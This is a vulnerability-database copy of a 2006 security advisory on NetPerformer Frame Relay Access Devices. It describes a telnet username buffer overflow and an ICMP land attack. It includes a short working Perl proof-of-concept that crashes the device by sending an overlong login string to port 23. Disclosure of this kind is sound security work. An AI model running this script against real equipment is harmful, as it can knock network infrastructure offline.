Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

netperformer.txt

🗓️ 14 Sep 2006 00:00:00Reported by Arif JatmokoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

NetPerformer FRAD ACT Multiple Vulnerabilities, Telnet Buffer Overflow, ICMP Land Attac

Code
`  
  
NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities  
  
.<=[ Arif Jatmoko ]=>.  
  
Release Date : 8 July 2006  
  
Product Affected :  
  
- NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and  
possibly newer  
- NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2), earlier, and  
possibly newer  
- NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1), earlier, and  
possibly newer  
- ....  
  
  
Web Site :  
www.netperformer.com  
  
  
=.[DESCRIPTION].=  
  
NetPerformer Frame Relay Access Device (FRAD) is switching & routing device  
that support Ethernet and SNA protocols, Voice, etc. This device mainly  
used for connecting distributed WAN network through frame relay or ATM  
network.  
  
  
  
=.[DETAILS].=  
  
1. Telnet long username Buffer Overflow.  
Passing an overly long username (>4550 char) against telnet service causes  
device to reboot. Successful remote exploitation will possibly allows an  
attacker gaining access into the device.  
  
  
==================================  
00.^.00==================================  
# __START_CODE  
#  
#!/usr/bin/perl  
  
use IO::Socket;  
use strict;  
  
my($socket) = "";  
  
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],  
  
PeerPort => "23",  
  
Proto => "TCP"))  
{  
print "Modhiar'000 ..... killing netperformer ... $ARGV[0]  
port 23...";  
sleep(1);  
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";  
sleep(1);  
print $socket "PASS " . "\r\n";  
close($socket);  
}  
else  
{  
print "Cannot connect to $ARGV[0]:23\n";  
}  
# __END_CODE  
  
==================================  
00.^.00==================================  
  
2. ICMP Land Attack  
By sending specially crafted ICMP packets will causes the device to be hang  
up and resetting current TCP handshake connection. In earlier version  
possibly will make device to reboot.  
  
  
WORKAROUND  
  
No Workaround yet for this vulnerability.  
  
Vendor Response Status :  
Vendor response very slow since discovered the above vulnerabilities.  
  
  
  
Arif Jatmoko //=.  
Information System Security Officer  
Coca-Cola Bottling Indonesia  
  
  
_______________________________________________________________________________  
Visit us at www.coca-colabottling.co.id  
  
CAUTION:  
This message may contain privileged and confidential information intended only for the use of the addressee named above. If you are not the intended recipient of this message, you are hereby notified that any use, dissemination,distribution, or reproducti  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Sep 2006 00:00Current
7.4High risk
Vulners AI Score7.4
netperformerfrad acttelnet buffer overflowicmpland attackvendor responsesecurity officervulnerabilities
25